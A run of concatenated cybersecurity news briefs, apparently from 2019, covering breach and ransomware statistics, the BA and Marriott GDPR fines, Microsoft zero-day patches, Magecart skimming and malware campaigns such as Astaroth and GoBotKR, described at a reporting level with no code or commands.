The report, The Economic Impact of Third-Party Risk Management in Healthcare, surveyed 554 healthcare IT and security professionals and found that these challenges are becoming more costly for healthcare providers, with the yearly hidden costs of managing vendor risk reportedly ringing in at $3.8 million per healthcare provider. On average, each healthcare provider has 1,320 vendors under contract, yet only 36% of respondents said they are able to effectively prioritize vendor risks and only 27% said they assess all of their vendors annually.
That cost from third-party risks is in excess of the $2.9 million that a data breach costs providers; however, the report also stated that over the last two years, 56% of healthcare organizations have experienced a data breach that had been introduced by one or more third-party vendors. As a result, the cost across the healthcare industry is $23.7 billion per year, according to the report.
“This research confirms that healthcare providers require a better, more cost-effective approach to third-party risk management,” said Ed Gaudet, CEO and founder of Censinet. “The adoption of technology in healthcare is more rapid and complicated than ever before. As an industry, we must help providers safely enable cloud applications and medical devices optimized to deliver the quality of care hospitals and their patients expect.”
“It’s clear that healthcare providers are in a tough spot. The number of vendors they rely on is increasing at the same time the threats those vendors pose are escalating in frequency and severity, so it’s easy to see how managing these risks has become an overwhelming problem,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. “But it’s not all bad news – we can very clearly see an opportunity with automation for healthcare providers to monitor, measure and mitigate the scourge of third-party breaches that continues to plague their industry.”
In related news, new research, The State of Healthcare Cybersecurity, from Bugcrowd found that vulnerability submission in the healthcare industry jumped 340.5% over the past year. “While we see an uptick in submissions in Q2 year-on-year, we are on track to see a steady increase in vulnerability again this year. Across programs run by healthcare organizations, more than 12% of all submissions are classified by the organization as P1 submissions, the most critical vulnerabilities, and the majority of the vulnerability submissions fall in the P3 level of criticality, just over 42%,” a Bugcrowd spokesperson wrote in an email.
Cyber-criminals are getting better at monetizing their attacks, with $45bn lost last year alone in two million incidents, according to Internet Society’s Online Trust Alliance (OTA).
The group’s new Cyber Incident & Breach Trends Report comprises information from the FBI, Risk Based Security, the Identity Theft Resource Center and other sources.
It paints the picture of a rapidly maturing cybercrime economy in which both tried-and-tested and emerging techniques are being used in highly effective ways to generate illicit profits for the black hats.
One example of this is ransomware: although overall infections declined 20% from 2017 figures, losses spiked by 60% as attackers focused on higher value business targets.
As reported by the FBI, Business Email Compromise (BEC) has also become a major money-maker for cyber-criminals, netting them $1.3bn in 2018 – double the figure of a previous year.
The report also warned of a 78% increase in digital supply chain attacks of the sort seen with groups using Magecart code to infect e-commerce sites. It claimed that two-thirds of organizations have suffered an attack costing on average $1.1 million, and estimated that half of all cyber-attacks last year involved the supply chain.
Credential stuffing attacks were also highlighted as an urgent threat to address, given figures claiming there were 30bn malicious log-in attempts last year.
On the plus side, there was a 3.2% decrease in reported data breaches last year, and the number of exposed records also dropped in 2018 from the previous year.
Still, the Internet Society claimed that 95% of breaches are preventable. It urged all organizations to put in place a tested incident response plan, to train employees on an ongoing basis and to continually review security, data management and privacy practices.
The report contains a handy checklist for organizations to help them get “incident ready."
"While it’s tempting to celebrate a decreasing number of breaches overall, the findings of our report are grim,” said Jeff Wilbur, technical director of the Internet Society’s Online Trust Alliance. “Cyber-criminals are using their infiltration ability to focus on new, more lucrative attacks. Staying up-to-date on the latest security safeguards and best practices is crucial to preventing attacks in the future.”
Microsoft patched 77 vulnerabilities yesterday including two zero-day flaws, one of which was being used in a targeted attack bearing the hallmarks of Russian state hackers.
The monthly update round saw Redmond fix privilege escalation vulnerabilities CVE-2019-0880 and CVE-2019-1132.
The latter was discovered by ESET researchers as part of a targeted attack in eastern Europe, using techniques similar to the infamous Kremlin group APT28 (aka Fancy Bear, Sednit).
“For example, the Sednit group’s local privilege escalation exploit we analyzed in 2017 used menu objects and exploitation techniques, which are very similar to the current exploit,” ESET researcher Anton Cherepanov explained.
Although, like the other zero-day, it requires an attacker to first establish a presence on an infected system, it could enable full system access when chained with other flaws.
CVE-2019-0880 is an elevation of privilege vulnerability in splwow64.exe.
“According to the advisory, the vulnerability could be combined with a remote code execution or a separate elevation of privilege vulnerability to gain arbitrary code execution,” explained Tenable senior research engineer, Satnam Narang. “Because it was exploited in the wild, it is likely it was paired with another vulnerability, but those details are not currently available.”
Those two zero-days were rated important. However, there are 15 classed as critical and a further four flaws which had been publicly disclosed in advance, potentially allowing black hats to work on exploits.
“One of the most critical vulnerabilities this month is present in Microsoft DHCP Server (CVE-2019-0785). This memory corruption vulnerability affects all versions of Windows Server from 2012 - 2019 and it is remotely exploitable,” argued Recorded Future senior solutions architect, Allan Liska.
“It allows an attacker to send a specially crafted packet to a DHCP server and, if successful in exploitation, execute arbitrary code. While this is a critical vulnerability, with a CVSS Score of 9.8, a very similar vulnerability, CVE-2019-0725, was announced in May. To date, Recorded Future has not seen any evidence of attackers exploiting this vulnerability in the wild. That does not mean organizations should not prioritize patching this vulnerability.”
Others highlighted by Liska included: RDS remote code execution (RCE) flaw CVE-2019-0887, which affects all versions of Windows from Windows 7-10 and Windows Server 2008-2019; memory corruption bug CVE-2019-1001 which affects Microsoft ChakraCore Scripting Engine, Internet Explorer 11, and Microsoft Edge; and an RCE flaw (CVE-2019-1072) in Azure DevOps Server and Team Foundation Server (TFS).
The NHS has repelled over 11.3 million email-based cyber-attacks over the past three years, highlighting the continued threat to healthcare systems in the UK, according to new Centrify research.
The security company sent Freedom of Information (FOI) requests to NHS Digital in a bid to uncover the true picture of threats to the NHSmail system, which is apparently used by more than 500,000 staff daily.
The majority of attacks were categorized as IP or domain reputation attacks, likely to be phishing attempts, accounting for over half (6.1m). Next came spam (3.6m) and malware-borne attacks (852,000).
Health service IT security teams were famously unprepared for the WannaCry ransomware worm of 2017 which exploited unpatched computers, causing the cancellation of an estimated 19,000 appointments and operations, disrupting a third (34%) of trusts.
That ended up costing the NHS around £92m in lost access to information and systems and emergency IT support – money that the health service can ill afford in an age of government austerity.
Last year, it received a £150m spending boost from central government to cover Windows 10 migration, a Security Operations Center (SOC), network upgrades and fixes for other “infrastructure weaknesses.”
However, the funding is spread out over three years and, whilst welcome, is unlikely to be enough to upgrade the health service’s ageing IT infrastructure – especially given the increasing scrutiny it’s being put under by hackers.
“It’s clear that hackers view the NHS as a top target with growing volumes of email attacks deliberately designed to fool doctors, nurses and other health service workers into handing over confidential data,” said Centrify VP, Andy Heather.
“Increasingly we’re seeing cyber-criminals gaining access to private information like patient records using legitimate log-in details which have been stolen or sold online. All too often this means that malicious activity remains undetected before it’s too late, so it’s vital that hospitals adopt a zero-trust approach to all user activity, ensuring every employee is verified and they are who they say they are.”
The Information Commissioner’s Office has announced an intention to fine Marriott International £99m for “infringements of the GDPR.”
Relating to an incident that Marriott reported in November 2018, which saw approximately 339 million guest records exposed globally, of which around 30 million related to residents of 31 countries in the European Economic Area (EEA) and seven million related to UK residents.
Information Commissioner Elizabeth Denham said: “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.”
In the original breach, Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014, where an unauthorized party had copied and encrypted information, and took steps towards removing it. “On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database” its statement said.
The ICO said that Marriott failed to undertake sufficient due diligence when it bought Starwood, and should also have done more to secure its systems. However Marriott has co-operated with the ICO investigation and has made improvements to its security arrangements since these events came to light.
In a statement, Marriott International’s President and CEO Arne Sorenson, said that it intended to contest the fine and was "disappointed" with the notice of intent.
Sorensen said: "We deeply regret this incident happened. We take the privacy and security of guest information very seriously and continue to work hard to meet the standard of excellence that our guests expect from Marriott.”
As with yesterday’s announcement of the intention to fine British Airways, Marriott will now have an opportunity to make representations to the ICO as to the proposed findings and sanction.
Denham said: “Personal data has a real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn’t happen, we will not hesitate to take strong action when necessary to protect the rights of the public.”
Justin Coker, VP EMEA at Skybox Security said that a bigger penalty does seem to be sending a message to any firms operating in the UK which are lingering in cybersecurity complacency. “While BA and Marriott have every right to challenge the size of their fines, such a painful levy against such iconic brands should be a landmark catalyst for change and put cyber hygiene and security compliance on every board’s agenda,” he said.
“Whether these companies get their fines adjusted or not, BA and Marriott can use the ICO judgement to take the high ground on knowing the value of proactive cybersecurity and how it can be harnessed to foster customer trust in the long term.”
Small and midsize businesses (SMBs) are more vulnerable to attacks because of their weaknesses in encryption, workload configuration, limited visibility and outdated and unsupported operating systems, according to Alert Logic.
Researchers analyzed more than 1.3 petabytes of data and approximately 8.2 million security events across more than 4,000 organizations of all sizes.
The new report, Critical Watch: SMB Threatscape 2019, found that two-thirds (66%) of SMB devices are running versions of Microsoft OS that will expire by January 2020 or are still running Microsoft OS versions that have expired, the majority of which are over 10 years old. The report also found that over 30% of SMB email servers operate on unsupported software, and almost a third of the top email servers detected were running on Exchange 2000.
For nearly half (42%) of all SMBs, encryption is in some way related to the security issues they face. In addition, vulnerabilities go unpatched by the vast majority (75%) of organizations in the SMB space.
“Our analysis of AWS configuration issues shows that encryption issues affect 33 percent of the SMB instances we scanned. This indicates encryption is not yet an instinctive behavior despite being a best practice and a requirement of many regulations including PCI-DSS, HIPAA, HITECH, GBLA, GDPR, NIST, SOX and state regulations such as CA SB 1386,” the report said.
“The continued lack of skilled cybersecurity professionals affects organizations of all sizes, and small and midsize businesses are at greater disadvantage because they can’t scale like large organizations can,” said Onkar Birk, senior vice president of product strategy and engineering at Alert Logic. “These organizations will greatly benefit from partnering with providers who can augment their limited teams with threat intelligence and experts to be more secure and compliant.”
“Alert Logic’s research confirms that SMBs would benefit from more cost-conscious security options to take some of the responsibility off their shoulders,” continued Birk. “That’s our mission. We aim to bring the level of security traditionally afforded to the Fortune 500 to businesses of any size.”
Almost half of businesses believe cloud apps make them a target for cyber-attacks, according to a survey of 1,050 IT decision makers who participated in Thales’ 2019 Access Management Index.
The report found that 49% of organizations admitted that cloud apps are likely one of the top three reasons their organization might be attacked. Cloud apps followed behind unprotected infrastructure such as IoT devices (54%) and web portals (50%), according to the study.
Across the globe, 75% of IT decision makers said they rely on access management to secure user logins for those employees who externally connect to online corporate resources. However, organizations in the UK are far less likely than the rest of the world (56%) to allow employees to log on to corporate resources using their social media credentials. Only 29% of UK companies allow employees to use social media credentials to log in, almost half by comparison.
Companies around the globe are looking to address cybersecurity issues by hiring strong leadership. In fact, the study found that four in 10 (38%) companies have appointed a CISO due to concerns over the number of breaches occurring in the last 12 months.
“While the UK has been slower to react to the rising number of data breaches by appointing a dedicated CISO, positively it’s ahead of the global average when it comes to using its expertise in the right places,” said Jason Hart, cybersecurity expert at Thales.
Businesses in the UK (19%) are slightly ahead of global organizations (14%) when it comes to empowering the CISO to make final decisions over cloud access management. “Giving CISOs the final decision on cloud access management is the most logical thing because they have the situational awareness to understand the risks facing the business and how to stop it. Many other countries worldwide are falling short of the mark here and leaving themselves exposed in the long run,” Hart said.
In the UK, organizations (63%) are more focused on the potential vulnerabilities posed by unsecured infrastructure than their global counterparts (54%). In fact, 55% of UK businesses would prefer a smart single sign-on (SSO) solution for those accessing the network.
Financial services organizations are suffering from an increased number of phishing attacks, according to a new report Mobile Security in the Financial Services, published by Wandera.
Researchers analyzed 4.7 million events across the subset of devices over the 6-month period. For mobile alone, each organization had an approximate average of 21,000 events. The report found that across other industries, phishing represents 42% of attacks, which is significantly lower in volume than those of the financial services industry, which is 57%.
“Phishing attacks are a daily threat for financial services companies and employees need regular training to help identify phishing attacks – not only via email, but also through social media and other messaging platforms. However, given the growing sophistication of phishing campaigns, FS companies can’t rely on awareness training as the only layer of defense. A multi-level approach needs to be adopted at the endpoint and in the network to offer comprehensive protection against phishing,” the report said.
The financial services industry is also at a higher risk of man-in-the-middle attacks (36%), a full 12 points higher than the cross-industry threat of 24%. The heightened number of threats could be the result of public WiFi usage as well as higher than normal travel activity, the report said.
According to those numbers, for every 20 people in financial services, one individual has their lock screen disabled, resulting in enormous ramifications if the device is lost or stolen. Oddly, though, only 1% of financial services organizations have devices impacted by crypto-jacking, which is lower than the 2.65% detected across other industries.
“In the financial services industry, as in many sectors, the security of client information is the most important asset, so it’s disconcerting to find mobile security still an afterthought,” said Michael Covington, vice president of product strategy at Wandera. “Financial organizations are struggling to keep pace with increasing regulations, rapid cloud migrations and rampant BYOD adoption, among other emerging technology trends, making it crucial that industry security pros work to secure not just the devices, but also the apps installed on them and the data they access."
The UK’s Institute of Information Security Professionals (IISP) has been awarded a prestigious Royal Charter, in a move which could help to attract more people into the industry to combat chronic skills shortages.
The newly named Chartered Institute of Information Security Professionals can now claim to be the authoritative body for the cybersecurity industry in the country. Royal Charters are rarely granted, and only to bodies that are able to prove pre-eminence in their field and who serve the public interest.
Under its new banner, the CIISP will continue its mission to promote knowledge sharing across the profession and develop standards for skills recognition and career development, at home and potentially overseas.
“As the cybersecurity industry continues to grow, professionalization has to be central to its agenda, and the institute’s chartered status will be a key component driving this forward,” said Alastair MacWillson, chair of the Chartered Institute of Information Security Professionals.
“The institute has spent over a decade using uniquely developed frameworks to set standards for skills, experience and roles across the profession and it’s hugely encouraging to see these standards and processes validated by charter incorporation.”
MacWilson also argued that its new status would help the institute encourage more applicants into the industry, which has been suffering from skills shortages for many years.
The global shortfall in information security professionals now stands at nearly three million, including 142,000 in EMEA. Of these, just a quarter (24%) are women.
According to a March Tripwire study, 85% of industry professionals polled claimed their IT security department is already understaffed, with only 1% saying they can manage all of their organization’s cybersecurity needs.
A separate poll for Infosecurity Europe in the same month found that over half (52%) of IT and security professionals believe skills shortages are putting their business at an increased risk of attack.
Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a commonly used technique in fileless malware attacks and so it proved this time, with attackers spreading the info-stealing malware via a spear-phishing link to a .LNK file.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make it difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats as they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.
Over a quarter of UK firms have suffered a ransomware attack over the past year, a major increase on figures from 2016, according to new research released by Databarracks.
The business continuity provider shared data from its upcoming Data Health Check survey, based on interviews with 400 IT decision makers.
It revealed that 28% of UK organizations have been hit by ransomware over the past 12 months. This is slightly lower than the peak of 29% in 2017, the year WannaCry hit, but much higher than the 2016 figure of 16%.
Databarracks managing director, Peter Groucutt, urged firms to formulate effective incident response plans, including recovery from backup.
“A ransomware attack will ultimately leave a business with two decisions: recover your information from a previous backup or pay the ransom. But even if a ransom is paid, it’s not certain your data will be returned. The only way to be fully protected is to have historic backup copies of your data,” he argued.
“When recovering from ransomware, your aims are to minimize both data loss and IT downtime. Outright prevention is not viable, so organizations should focus on organizing their defensive and preventative strategies to reduce the impact of an attack.”
It’s not just the UK that has seen an increase in ransomware attacks of late. In the US, several Florida cities have been hit, with two of them agreeing to pay the hackers hundreds of thousands of dollars to get their data back.
Although ransomware attacks on consumers decreased 33% year-on-year in Q1 2019, those against corporates surged by over 500%, according to Malwarebytes.
“The incident response team must have the authority to make large-scale, operational decisions quickly. This includes being able to take systems offline to prevent the spread of infection,” explained Groucutt.
“Once isolated and contained, you must find when the ransomware installation occurred to be able to restore clean data from before the infection. When the most recent, clean data is identified you can begin a typical recovery, restoring data and testing before bringing systems back online again.”
The Department of Energy (DOE) engaged in conversations with industry partners in order to advance the cybersecurity of industrial control systems in the nation’s critical infrastructure, including power utilities and pipelines, according to FedScoop and E&E News.
“Private entities and key agencies formed a consortium over concerns industrial control systems (ICS) are increasingly being targeted by nation-states, hacktivists and advanced persistent threats, but such incidents aren’t being discussed,” FedScoop reported.
Since meetings took place over a week ago, a team of industry leaders have set to work with the focus of delivering a report and key recommendations by the end of July, according to Jason Haward-Grau, CISO at PAS Global.
“The DOE’s driver is enabling a safer and more secure pipeline infrastructure, there is no expectation that the accountability will change from the TSA,” said Haward-Grau. “The EU response to both the risks and the need to protect the critical infrastructure space is becoming acknowledged as a solid mechanism for governments to build upon their varied security foundations to establish the framework for cybersecurity in the operational security arena. There are more countries (and even states in the US) looking to establish the same principles, practices that are already being deployed in the EU.”
Because nation states continue to openly demonstrate their enhanced cyber offensive capabilities, governments and private industry alike are increasingly concerned about malicious actors targeting critical infrastructure. Because of the nature and importance of ICS, they are high on the list of targets, driving the growing desire to protect it.
“Coupled with the drive toward digitization of the operational technology (OT) end points, the potential attack surface for OT is growing wider and presents a more attractive target as the opportunity to ‘play the odds’ means the defenders have to be 100% successful to keep their environments secure, whereas the attackers just need to get lucky once,” said Haward-Grau.
“There is an increasing challenge in insuring that we have the right skilled resources available to drive the improved security programs as not only is there a major shortage in IT, there is a lack in OT and the difference between OT and IT is compounding the challenge.”
A malware campaign has been targeting Korean TV torrent websites, according to researchers at ESET.
The malware, which is focused on South Korea, reportedly grants attackers remote control of the compromised devices. Researchers have dubbed the malware Win64/GoBot2 variant GoBotKR given that the actors behind GoBotKR are building a network of bots that can then be used to perform DDoS attacks of various kinds, according to today’s press release.
“The attackers behind this campaign try to trick users into executing the malware by booby-trapping the contents of the torrents with malicious files that have deceptive filenames, extensions and icons,” says ESET researcher Zuzana Hromcová, who analyzed the malware. “Directly opening the intended MP4 file will not result in any malicious action. The catch here is that the MP4 file is often hidden in a different directory, and users might first encounter the malicious file mimicking it.”
Though not very technically complex, the malware collects system information about the compromised computer after being executed. According to the researchers, the information collected includes network configuration, OS version information and CPU and GPU versions along with a list of installed antivirus software.
“This information is sent to a C&C server, which helps the attackers determine which bots should be used in the respective attacks. All C&C servers that we extracted from the analyzed malware samples are hosted in South Korea and registered by the same person,” said Hromcová.
The evasion techniques of GoBotKR are from a researcher’s perspective, said Hromcová. One particularly notable technique is that when the malware scans running processes on the compromised system, it self-terminates if any of the products are detected.
“Overall, the modifications show us that the attackers customized the malware for a specific audience, while taking extra effort to remain undetected in their campaign” said Hromcová.
Due to ‘unforeseen circumstances,” Hillary Clinton has reportedly withdrawn her invitation to deliver the keynote speech at the 2019 FireEye Cyber Defense Summit, according to news from the Daily Caller.
Infosecurity has contacted FireEye and Clinton’s office to confirm that the former US secretary of state will no longer be speaking at the cybersecurity event. Clinton is not listed among the 2019 speakers for the event, and a detailed agenda including keynote details is not yet available on the conference website.
Clinton was invited to participate in a Q&A discussion with FireEye CEO, Kevin Mandia, “on the geopolitical landscape and its implications for global cybersecurity today. Secretary Clinton has been a practicing attorney and law professor, an advocate of internet freedom, First Lady, and US Senator from New York, in addition to serving as the 67th United States Secretary of State,” according to a May 30 press release.
“Differences among nations today, driven by friction in geopolitics, economics, security and technology, are having a significant impact on global cyber conflict. Secretary Clinton’s extensive knowledge of foreign policy, her firsthand experience on the front lines of diplomacy, and her understanding of the challenges facing open, democratic societies give her a unique perspective on some of the most pressing conversations shaping our world today,” said Mandia.
Clinton delivering the keynote address received much fodder on social media, with some expressing ‘laughter’ while others admitting that they cancelled their registrations.
“Just cancelled my plans to go to #FireEyeSummit. No way to trust a cyber company that thinks it is a good idea for a govt official that is willing to run a private, unprotected server, out of her home is a keynote speaker. Her disposal techniques are umm,” one person tweeted.
If Clinton has officially withdrawn, the news has remained tightly under wraps. Despite critics expressing their dissatisfaction at the news that she would be speaking, Twitter has remained very quiet since the Daily Caller reported the news on July 4.
Security researchers have discovered another major digital skimming campaign, this time compromising over 960 e-commerce sites in just a day.
Sanguine Security, which produces a malware scanning tool for popular e-commerce software platform Magento, revealed the findings in a tweet on Friday.
It described the discovery as “the largest automated campaign to date” – with 962 sites infected with the infamous Magecart code.
That’s far higher than the previous number of 700 online stores and indicates a highly automated operation, as the attacks happened in a 24-hour period with victims located around the world.
It’s believed the attacks could be the result of hackers exploiting a vulnerability in Magento.
In March, for example, a critical SQLi flaw was revealed which allows for remote code execution. Although it was patched by the vendor, it may still be exposing countless organizations to the risk of attack.
The destructive power of Magecart has been plain to see over recent months. Just today, airline BA was fined over £183m for failing to protect its web infrastructure from a Magecart attack last year, leading to the compromise of personal data on around 500,000 customers.
The latter appears to be what happened here: with a possible Magento flaw providing simple access for attackers to hundreds of sites running the insecure version of the CMS software.
Sanguine Security has published the new version of the skimming code on GitHub Gist, although confirmed details on how this most recent attack worked have yet to emerge.
Cyber-attacks on UK businesses hit an all-time high in the second quarter of 2019, averaging one every 50 seconds, according to Beaming.
The business ISP analyzed traffic for its customers during the period and found them to be on the receiving end of 146,491 attempted attacks each, on average. That’s 179% higher than the same period in 2018, when firms faced down 52,596 attacks on average.
IoT devices and file sharing services were most frequently targeted, hit by 17,737 and 10,192 attacks respectively during the quarter.
This chimes somewhat with a FireEye report from last month which revealed a dramatic increase in attacks exploiting file-sharing services to deliver malware via email. From hardly being used in any attacks in Q4 2018, OneDrive was seen in over 60% by Q1, it claimed.
Hackers often target file-sharing services with their phishing emails as they bypass the initial domain reputation checks made by security tools.
Beaming also identified over 371,000 unique IP addresses used to launch cyber-attacks in Q2 2019: a plurality were traced back to China, with significant activity also originating in Taiwan, Brazil, Egypt and the US.
However, this is more of an indication of where the most compromised PCs are, rather than necessarily the geographical location of the attackers themselves.
Beaming managing director, Sonia Blizzard, argued that companies of all sizes are under attack.
“The majority of cyber-attacks on businesses are indiscriminate, malicious code that trawls the web seeking to exploit any weak point in cybersecurity systems. A single breach can be catastrophic to those involved,” she added.
“We do lots at a network level to minimize the threat of online attacks, but businesses need to take the threat seriously, educate employees and put in place measures such as managed firewalls to ensure they don’t expose themselves to undue risk.”
The Anti-Fraud Technology Benchmarking Report assessed data from more than 1000 ACFE members regarding their organizations’ use of tech to fight fraud, discovering that while only 13% of businesses currently use AI and machine learning to detect/deter fraudulent activity, another 25% plan to do so in the next year or two.
Other key findings discovered that 26% of organizations are using biometrics as part of their anti-fraud programs, with another 16% expecting to deploy biometrics by 2021, while more than half of respondents (55%) plan to increase their anti-fraud tech budgets over the next two years.
“As criminals find new ways to exploit technology to commit schemes and target victims, anti-fraud professionals must likewise adopt more advanced technologies to stop them,” said Bruce Dorris, JD, CFE, CPA, president and CEO of the ACFE. “However, which technologies are most effective in helping organizations manage rising fraud risks? The answer to this question can be crucial in successfully implementing new anti-fraud technologies.”
Laurent Colombant, continuous controls and fraud manager at SAS, added: “The tools available for fraud prevention are now more intelligent than ever. We’re no longer restricted to merely reacting to fraud after it happens – with the right AI-enabled tools in place, anti-fraud teams can now begin to intelligently predict potential danger spots and flag up early warning signs to ensure efforts are co-ordinated and effective.
“The emergence of AI, machine learning and predictive modelling is helping investigators to pre-emptively detect fraudulent activity, allowing them to stay ahead of the increasingly sophisticated techniques being employed by criminals.”
British Airways (BA) has been hit by a record £183m GDPR fine after failing to prevent a digital skimming attack last year.
UK regulator the Information Commissioner’s Office (ICO) said the £183.39m penalty was levied due to “poor security arrangements” at the carrier, leading to the compromise of personal data on around half a million customers.
“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft it is more than an inconvenience,” said information commissioner, Elizabeth Denham.
“That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
The fine is the biggest ever levied by the ICO, publicly at least, but still amounts only to around 1.5% of the airline’s global annual turnover as of 2017 – far less than the maximum 4% allowable.
That said, BA will be appealing to the ICO. Chairman and CEO, Alex Cruz, claimed the company responded quickly to the incident and that it has found “no evidence” of the data being used in follow-on fraud.
However, security researchers claimed to have found the stolen personal information up for sale online just a week after the incident.
The attack involved an increasingly popular form of digital skimming code known as Magecart, which was inserted covertly onto the BA site to harvest user card information without its knowledge.
The data stolen included log-in, payment card and travel booking details as well as name and address information, according to the ICO.
Raef Meeuwisse, ISACA expert speaker and author, argued that commentators should refrain from passing judgement until the outcome of BA’s appeal is known.
“This fine is a timely wake-up call for enterprises that under-investment, especially in cybersecurity, is a false economy. It is also a reminder that you cannot just leave mission-critical third-party activities with anything less than mission-critical levels of verified security,” he said.
“However, I think we need to await the outcome of any appeal and what the final amount of the fine really is. If the amount reduces substantially during the appeals process, then the executives in other organizations who are just about to raise the risk-levels and investment in both data privacy and security will probably breathe a sigh of relief.”
The largest forensic services provider in the UK, Eurofins Scientific, has reportedly paid a ransom to criminals after its IT systems were disrupted in a cyber-attack. The amount of the ransom has not been disclosed, though BBC News reported that the attacks also resulted in the British police suspending its work with the global testing company.
Law enforcement agencies have refrained from sending new samples to Eurofins for analysis, according to reports. The Crown Prosecution Service told the BBC: “We are working to make sure all hearings remain fair and based on reliable evidence. While investigations are ongoing, prosecutors will assess the impact on a case-by-case basis. Cases where forensic evidence does not play a major role will continue as usual if all parties agree. If test results provided by Eurofins are central, we will seek to adjourn cases for the shortest possible period.”
Given that the investigation of the attack remains ongoing, Eurofins is refraining from commenting.
“This kind of attack was inevitable. While many security experts warn about paying ransoms or entering into negotiations, the answer in reality comes down to simple economics,” said Barry Shteiman, vice president of research and innovation at Exabeam.
“If the downtime caused by data being unavailable, or by the backup restoration process, is more expensive than paying the ransom, then organizations should pay. Equally, if giving up on the encrypted data has a higher cost in lost revenue or intellectual property than remediation, then you can also see why an organization would pay the ransom. Of course, this is a last resort, if all other options have been exhausted,” Shteiman continued.
Still, ransomware is only one type of attack that organizations need to protect against, said Derek James, regional director of EMEA for WhiteHat Security. “You need to protect against all threats, not one specific one. For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Backing up data and using up-to-date encryption will help negate some of the risk of ransomware.”
A survey of 320 IT experts conducted by Gurucul found that one in 10 respondents admitted they would try to take as much company information with them as possible before they left their jobs. In addition, the survey found that 15% of participants would delete files or change passwords upon exiting.
While a number of organizations have invested in technologies to help detect and defend against external attackers, many companies are starting to better understand the risks from insider threats, which a recently published whitepaper said may actually be a larger issue.
According to the report insider attacks are more difficult to detect and prevent than external ones, with 91% of respondents in a similar survey of IT and security professionals reporting they feel vulnerable to both malicious and accidental insider threats.
“Gurucul mitigates these risks by employing behavioral analytics,” said Craig Cooper, COO of Gurucul. “By combining user and entity behavior analytics, and identity analytics, companies can not only monitor, detect and remove excess access before it is too late, but they can also monitor employee actions by detecting unusual or risky behavior. By detecting when users are acting in ways that contradict their normal behavior and job function, our customers are able to intervene.”
At issue is teams are overloaded with identities and entitlements because of the manual processes built into the static identity management rules and roles. “It is more common than not that users inside the perimeter have access to information they do not need for their job. This gives them the capability to perform abusive tasks within the company. However, insider threats are not always caused by users within the organization. They can also occur when credentials of employees are shared or compromised, which often goes undetected,” wrote Gurucul’s Alison DeNisco Rayome in a July 2 blog post.